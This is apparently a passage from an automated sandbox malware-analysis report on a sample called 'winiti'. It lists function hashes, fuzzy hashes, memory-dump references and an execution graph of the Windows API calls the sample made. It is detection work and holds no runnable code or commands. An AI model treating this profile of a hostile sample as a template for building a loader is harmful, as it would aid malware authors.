                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cefd4ea49894df468f519c8df38987e3ca1e269b7ee21bc75450ae04a3ae7de6
                              • Instruction ID: 4c5f39216f38cc06c11c57d067a080be3f6df133b2fbda472c7b6c3fb644480f
                              • Opcode Fuzzy Hash: cefd4ea49894df468f519c8df38987e3ca1e269b7ee21bc75450ae04a3ae7de6
                              • Instruction Fuzzy Hash: 88012C74D09308CBDB08DF66C4087BEB7BAAF8A300F15D02AC81967391DB755645CF80
                              Function 00184820 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cd80d88f8ef4338bba1ce2808f3ddb471876ebe1cf61dbfbae99562315da9ae1
                              • Instruction ID: 1084c36d1934c1acbc7ecea2c85d18dcfa07271f737f09c07729babec16cfd8e
                              • Opcode Fuzzy Hash: cd80d88f8ef4338bba1ce2808f3ddb471876ebe1cf61dbfbae99562315da9ae1
                              • Instruction Fuzzy Hash: D901AF7190A380AFC702DBB4C850498BFB4EF6732174A42E7C454CB2A3EB354E46CBA1
                              Function 0018F948 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60850542d5b529407a942c8d8635128204ae57b5ba5fca5814e2face750fe4ef
                              • Instruction ID: d67d31d25a2170b3a72ec77ecf853d97a0e37889638bf6e63ccce76d683c1044
                              • Opcode Fuzzy Hash: 60850542d5b529407a942c8d8635128204ae57b5ba5fca5814e2face750fe4ef
                              • Instruction Fuzzy Hash: AF01A834A04208EFD704EFA8D559AADBBF5EF49305F2590A8E40997361D730DF51EB40
                              Function 00180839 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00d7bc41b98ab687d40cfbfdc41e9cbb1d0d6d4161b1a106642b144692cc848d
                              • Instruction ID: 3944a2236c8462d961c18ba5c10619165f6d4ff096820dafbe7b27d37cb7eda1
                              • Opcode Fuzzy Hash: 00d7bc41b98ab687d40cfbfdc41e9cbb1d0d6d4161b1a106642b144692cc848d
                              • Instruction Fuzzy Hash: B3F0A97194220CDFCB56FBB0C925A2E73B4EF86304F0018A9D00AA3291DB319F48DB84
                              Function 00180848 Relevance: .0, Instructions: 26COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9aac67d5357e69f89dc2dc590d0ebeaef3b09d5f9c28f8545314467a211099c0
                              • Instruction ID: 8bee06287527efd35ff6d785e3afd122f271680c0c9084cba7e5b366ee312bec
                              • Opcode Fuzzy Hash: 9aac67d5357e69f89dc2dc590d0ebeaef3b09d5f9c28f8545314467a211099c0
                              • Instruction Fuzzy Hash: 3EE04F7095220D9BDB54FBB0991196E72B4DFC6304F50196CD00AA32D1DF315F44D795
                              Function 00180484 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 32f557aad50f5451e082f3b0290e6126597704acf9e8a14df5f336986d88ff4e
                              • Instruction ID: 905a827cf6fbbdfd31efd4c12b30f55ceb394c76dc02c7f62fcb66c0cc5d181b
                              • Opcode Fuzzy Hash: 32f557aad50f5451e082f3b0290e6126597704acf9e8a14df5f336986d88ff4e
                              • Instruction Fuzzy Hash: D6E01A7094210CABD799EBA9E551BAAB3A9EF8A300F5120A8E009A3261DB305F04DB54
                              Function 00184DA0 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 48361e2583b91ac6bc0e8bca0b443a456cb051258f0a94edb2edf3aca8519a89
                              • Instruction ID: 6491b458d2a2f20129e6235867ba0f4fe75b2007718b1078f759e18bc88b9328
                              • Opcode Fuzzy Hash: 48361e2583b91ac6bc0e8bca0b443a456cb051258f0a94edb2edf3aca8519a89
                              • Instruction Fuzzy Hash: 30E0863A3001149BC704777DB81D92F7BDEEBC8221B654065E906C3358DE34DC5747A1
                              Function 00183AF0 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce538ba7f691bb9bf92d8ef460777e728e6c9c4ccc1e8904b537fe4050797995
                              • Instruction ID: f392fe7c16f15602cbeaa25008ee2f4fa73653c8bb9613c443da01d7faa98a74
                              • Opcode Fuzzy Hash: ce538ba7f691bb9bf92d8ef460777e728e6c9c4ccc1e8904b537fe4050797995
                              • Instruction Fuzzy Hash: 78E04FB684A248EFC742CBB899904E97FF9EF5620171141EAD505D7222E7350E049B72
                              Function 001895BC Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b68f3b548d8f042bf2b27ef189d57f65e015227a9c9f8e472164baae1a4df2a
                              • Instruction ID: 2587f209dc7b99913fff0ce0e9e339f0a17f5f65dfec14f5fa4bcc7b7184d20f
                              • Opcode Fuzzy Hash: 2b68f3b548d8f042bf2b27ef189d57f65e015227a9c9f8e472164baae1a4df2a
                              • Instruction Fuzzy Hash: 58E0EC3494E344DFCB099F65D0085BCBBBCBF0B300B166082D81A9B252C3789944DF44
                              Function 001895DA Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                              • Instruction ID: 1b6a955f22946a812b163658c315c5e9fa9b117320df33045e177ca9bd639cc4
                              • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                              • Instruction Fuzzy Hash: FDD09E7894E744DFCB0AEB62C4449FCB77CBB0E304B2AA946D81B5B202D7749645DF44
                              Function 001847EF Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c3c3ec3950146428654a2c24be21e115a249dd598d2a65d4835254a8a14dab9d
                              • Instruction ID: 63093cbcd30305128baa2d097dfe67eb0eb52c9521ab2aaebd33469d6d054de3
                              • Opcode Fuzzy Hash: c3c3ec3950146428654a2c24be21e115a249dd598d2a65d4835254a8a14dab9d
                              • Instruction Fuzzy Hash: CCE0127064A7C19FC30297B4C850494BF70AFB722075A969BC4A08A2D3DA255987C751
                              Function 00183B00 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ba8bf20adae8bae786149bd53a91e488f5de03d619ee92bc3184dd036e05a9c
                              • Instruction ID: 46cc30f104deedc72b41b3952dc31aa6ca5f7b2b50f4a93b4b4d6814e397c55c
                              • Opcode Fuzzy Hash: 9ba8bf20adae8bae786149bd53a91e488f5de03d619ee92bc3184dd036e05a9c
                              • Instruction Fuzzy Hash: AED0C97190920CEFCB40DFA8EA4459EBBFDEB45200B1041EADA09D7210FF325B109B91
                              Function 0018B3A1 Relevance: .0, Instructions: 11COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e9de9d06cc0c1346f9309e7778d93ae9af156a9c292cb333d9db12ea2296c17e
                              • Instruction ID: 172b323528219321c4bbcbae303dc7e17f02b0cdc7322dc26b17466ce53bf1f0
                              • Opcode Fuzzy Hash: e9de9d06cc0c1346f9309e7778d93ae9af156a9c292cb333d9db12ea2296c17e
                              • Instruction Fuzzy Hash: 12D0125000EBD8AFC7038B308CA28807F30BD5320030E82CBD4A48F0E3CB20AA2AC346
                              Function 0018D220 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14a36d6da021623b0752e750a33d3d5e487dd146c93366b444757ca04303605d
                              • Instruction ID: a6f11624fc5da75975b0183d05addce0b4924f39b2869515479964dbac49782f
                              • Opcode Fuzzy Hash: 14a36d6da021623b0752e750a33d3d5e487dd146c93366b444757ca04303605d
                              • Instruction Fuzzy Hash: F6C04C300017048FD21AA794BD1D7287758A742B16F401150E54D514B14B7155D4CA69
                              Function 00188681 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66faa44701f910e668a25328ecfda8dcfeeb59e7d28ed267ec4c2953a0556141
                              • Instruction ID: 6cff0e7ceb7e7bcb509155f7da3d397e6b4ef692c1f5acdfe99e92048130c2ae
                              • Opcode Fuzzy Hash: 66faa44701f910e668a25328ecfda8dcfeeb59e7d28ed267ec4c2953a0556141
                              • Instruction Fuzzy Hash: 15C012A140E2C0AFC303877088A04407F302E6B00530A00CFC8A08B0A3DA062A25D393
                              Function 00188F8F Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7c3c9d2f2e139bdc3c0acf1c21942c8579c7636ce0e1472c9896527630792a91
                              • Instruction ID: 127e200fb5b4b75124b7b05ee87a32e9107e960567e49e6b5e75a09408d73b9c
                              • Opcode Fuzzy Hash: 7c3c9d2f2e139bdc3c0acf1c21942c8579c7636ce0e1472c9896527630792a91
                              • Instruction Fuzzy Hash: 87C0023490E244CFC729AFA4D8545AC7B75AF0A341B76405AE12797252CB205A44EF15
                              Function 00188F1E Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51704b1620d1ccf479b60d5de302f90c5d5aa6ec1d0bc2d2b83b72210fe89c97
                              • Instruction ID: c38ee2043eb7edb7c90a748ed3a05882f3d1cee9c3ddf1e6aba7d219d501249b
                              • Opcode Fuzzy Hash: 51704b1620d1ccf479b60d5de302f90c5d5aa6ec1d0bc2d2b83b72210fe89c97
                              • Instruction Fuzzy Hash: 6BC04C34D09204CFC7249FA4D4545AD7775AB0D341B714019D02753112C7205941EF00

                              Non-executed Functions

                              Function 00592220 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: DdM
                              • API String ID: 0-2167304064
                              • Opcode ID: 012eadfb36ab57599cbea5acad84d0ae856e02b2f87fd93a8cab32b2f7b5b4e3
                              • Instruction ID: f399e94c4897fab85737f582ee0a9c85615c0d32c0b1897cc84c3ad9f212f868
                              • Opcode Fuzzy Hash: 012eadfb36ab57599cbea5acad84d0ae856e02b2f87fd93a8cab32b2f7b5b4e3
                              • Instruction Fuzzy Hash: 4BE12774E002598FDB14DFA8C5809ADBBF2BF89305F248569E819AB356C731AD46CF60
                              Function 00592B50 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: lhM
                              • API String ID: 0-465909716
                              • Opcode ID: d0ba9d448d2f14377bc2b19076d32472285f58f9047e5e0e1e4f6532b885f024
                              • Instruction ID: 0b1bb937205415e0a64d3b48a248499447bb58baa58ebd0c38e0c24ab612c269
                              • Opcode Fuzzy Hash: d0ba9d448d2f14377bc2b19076d32472285f58f9047e5e0e1e4f6532b885f024
                              • Instruction Fuzzy Hash: C0E10674E002199FDB14DFA8C5809ADBBF2FF89305F248169E815AB356C731AD46CFA0
                              Function 005919B1 Relevance: .3, Instructions: 320COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c04afc25a91724814f65b5f0b9224d8e1633d955a0fe31c9c14827ef1ae28a3a
                              • Instruction ID: 2d16d53faf26461573942d326f08d77b260c5b4bb2e7b0729b11fa5393994011
                              • Opcode Fuzzy Hash: c04afc25a91724814f65b5f0b9224d8e1633d955a0fe31c9c14827ef1ae28a3a
                              • Instruction Fuzzy Hash: E3E13874E006298FDB14DFA8C5809ADFBF2BF89304F248169E815AB356D731AD46CF64
                              Function 00591DE8 Relevance: .3, Instructions: 315COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 899bc9b1706943d47c41c9bfa7d4e3c7b80064f08c8c4faba6ba13ad6318e2bb
                              • Instruction ID: 9e1aa7f1de58d612a6f978a78955c3e1c377d3dc4293243725cb50ddd52664b9
                              • Opcode Fuzzy Hash: 899bc9b1706943d47c41c9bfa7d4e3c7b80064f08c8c4faba6ba13ad6318e2bb
                              • Instruction Fuzzy Hash: BBE12874E001598FDB14DFA9C5809AEFBF2BF89305F248169E815AB356C731AD46CFA0
                              Function 00592718 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c48ad693b1c57ef72e47327a20be5cde20285264be84cff6ac257bb81f22f65
                              • Instruction ID: 66361cbb366e10b4c096de37c3dabb8c7229cc47c305a46da74a8fd85e719e0e
                              • Opcode Fuzzy Hash: 4c48ad693b1c57ef72e47327a20be5cde20285264be84cff6ac257bb81f22f65
                              • Instruction Fuzzy Hash: A7E10774E002199FDB14DFA9C5809AEBBF2FF88305F248169D815AB356C731AD46CFA0
                              Function 00183B38 Relevance: .1, Instructions: 141COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.366966634.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_180000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13f01ec32925babd8d8af670ef914779fd260b4ba3b89bbb066d6bf9487b75b7
                              • Instruction ID: 00bb714f185caffb13e551a4aa125a81176b67c065bba516fdbea32978cf9770
                              • Opcode Fuzzy Hash: 13f01ec32925babd8d8af670ef914779fd260b4ba3b89bbb066d6bf9487b75b7
                              • Instruction Fuzzy Hash: 58515071A106048FE708EF7AE842A5EBBE3AFD8304F44C439D0549B278EF34564A9F55
                              Function 00592709 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 652f73ba74cab0c4f74f758124c115010b898cf460e8cce782b2c17466fb2863
                              • Instruction ID: a94e5b593ccc74ed67bfbaa500d1627f1b69032626958b42970a23e49f55adce
                              • Opcode Fuzzy Hash: 652f73ba74cab0c4f74f758124c115010b898cf460e8cce782b2c17466fb2863
                              • Instruction Fuzzy Hash: 6351FB74E042198FDB14DFA9C5809AEBBF2FF89304F24816AD418A7356D7319D45CFA1
                              Function 00592230 Relevance: .1, Instructions: 127COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 283ae8cd40883b6e3e7e9bf096ba1fc9f36c9f1a58c0344f43403789576414b3
                              • Instruction ID: 4bd4bea2d151aa24221fd667484160cb2110f650c1b9c8f9195b059a24b6ffc0
                              • Opcode Fuzzy Hash: 283ae8cd40883b6e3e7e9bf096ba1fc9f36c9f1a58c0344f43403789576414b3
                              • Instruction Fuzzy Hash: AC510974E002198FDB14DFA9C5809AEFBF2BF89304F24856AD419A7356D7359E42CFA0
                              Function 005919C0 Relevance: .1, Instructions: 127COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000005.00000002.367047125.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_590000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d79e15bac0298192757dd0f7c0d3b32c8a956924fb1683a873497c8fca6a3df
                              • Instruction ID: d39236b377992694cc27c0600fbbca94c31052dc57f218c6a732328f8e69f2cd
                              • Opcode Fuzzy Hash: 2d79e15bac0298192757dd0f7c0d3b32c8a956924fb1683a873497c8fca6a3df
                              • Instruction Fuzzy Hash: 64512974E006298FDB14DFA9C5809AEFBF2BF89300F248169D408A7356D7319E46CFA4

                              Execution Graph

                              Execution Coverage:0.9%
                              Dynamic/Decrypted Code Coverage:4.1%
                              Signature Coverage:7.2%
                              Total number of Nodes:97
                              Total number of Limit Nodes:8
                              execution_graph 78408 42f0c3 78409 42f0d3 78408->78409 78410 42f0d9 78408->78410 78413 42e0a3 78410->78413 78412 42f0ff 78416 42c213 78413->78416 78415 42e0be 78415->78412 78417 42c22d 78416->78417 78418 42c23e RtlAllocateHeap 78417->78418 78418->78415 78419 424803 78420 42481f 78419->78420 78421 424847 78420->78421 78422 42485b 78420->78422 78424 42bee3 NtClose 78421->78424 78429 42bee3 78422->78429 78426 424850 78424->78426 78425 424864 78432 42e0e3 RtlAllocateHeap 78425->78432 78428 42486f 78430 42befd 78429->78430 78431 42bf0e NtClose 78430->78431 78431->78425 78432->78428 78506 42b4d3 78507 42b4f0 78506->78507 78510 d7fdc0 LdrInitializeThunk 78507->78510 78508 42b518 78510->78508 78511 42f1f3 78512 42f163 78511->78512 78513 42f1c0 78512->78513 78514 42e0a3 RtlAllocateHeap 78512->78514 78515 42f19d 78514->78515 78516 42dfc3 RtlFreeHeap 78515->78516 78516->78513 78522 424b93 78523 424bac 78522->78523 78524 424bf7 78523->78524 78527 424c37 78523->78527 78529 424c3c 78523->78529 78525 42dfc3 RtlFreeHeap 78524->78525 78526 424c07 78525->78526 78528 42dfc3 RtlFreeHeap 78527->78528 78528->78529 78530 413ab3 78532 413ad3 78530->78532 78533 413b3c 78532->78533 78535 41b213 RtlFreeHeap LdrInitializeThunk 78532->78535 78534 413b32 78535->78534 78433 401a64 78434 401a80 78433->78434 78434->78434 78437 42f593 78434->78437 78440 42db73 78437->78440 78441 42db99 78440->78441 78450 407313 78441->78450 78443 42dbaf 78449 401b69 78443->78449 78453 41af43 78443->78453 78445 42dbce 78446 42dbe3 78445->78446 78447 42c2b3 ExitProcess 78445->78447 78464 42c2b3 78446->78464 78447->78446 78452 407320 78450->78452 78467 4166d3 78450->78467 78452->78443 78454 41af6f 78453->78454 78489 41ae33 78454->78489 78457 41afb4 78460 41afd0 78457->78460 78462 42bee3 NtClose 78457->78462 78458 41af9c 78459 41afa7 78458->78459 78461 42bee3 NtClose 78458->78461 78459->78445 78460->78445 78461->78459 78463 41afc6 78462->78463 78463->78445 78465 42c2cd 78464->78465 78466 42c2de ExitProcess 78465->78466 78466->78449 78468 4166ed 78467->78468 78470 416706 78468->78470 78471 42c953 78468->78471 78470->78452 78472 42c96d 78471->78472 78473 42c99c 78472->78473 78478 42b523 78472->78478 78473->78470 78479 42b53d 78478->78479 78485 d7fae8 LdrInitializeThunk 78479->78485 78480 42b569 78482 42dfc3 78480->78482 78486 42c263 78482->78486 78484 42ca15 78484->78470 78485->78480 78487 42c280 78486->78487 78488 42c291 RtlFreeHeap 78487->78488 78488->78484 78490 41ae4d 78489->78490 78494 41af29 78489->78494 78495 42b5c3 78490->78495 78493 42bee3 NtClose 78493->78494 78494->78457 78494->78458 78496 42b5e0 78495->78496 78499 d807ac LdrInitializeThunk 78496->78499 78497 41af1d 78497->78493 78499->78497 78500 417aa5 78501 417aa2 78500->78501 78502 417a58 78500->78502 78503 417a63 LdrLoadDll 78502->78503 78504 417a7a 78502->78504 78503->78504 78505 d7f9f0 LdrInitializeThunk

                              Executed Functions

                              Function 00417A03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 266 417a03-417a2c call 42ecc3 269 417a32-417a40 call 42f203 266->269 270 417a2e-417a31 266->270 273 417a50-417a61 call 42d663 269->273 274 417a42-417a4d call 42f4a3 269->274 279 417a63-417a77 LdrLoadDll 273->279 280 417a7a-417a7d 273->280 274->273 279->280
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                              • Instruction ID: ee6c7ceef1adf1cf5f0f5272745ac9c454e7c3774a2bd0dbb7ae4b93fd6402ff
                              • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                              • Instruction Fuzzy Hash: AF015EB5E4020DABDB10DBE5DC42FDEB7789F14308F4041AAE90897240F635EB488B95
                              Function 0042BEE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 293 42bee3-42bf1c call 404703 call 42d153 NtClose
                              APIs
                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                              • Instruction ID: 506154e8a8f3fb9aa3bbf7faef934b62bf1fce9cdcae224abcf988a766b44963
                              • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                              • Instruction Fuzzy Hash: 60E0DF362002007BC110BB5ADC01F9B739CDBC1714F00401AFA0C67241C674790486E5
                              Function 00D807AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                              Function 00D7F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 303 d7f9f0-d7fa05 LdrInitializeThunk
                              APIs
                              Memory Dump Source
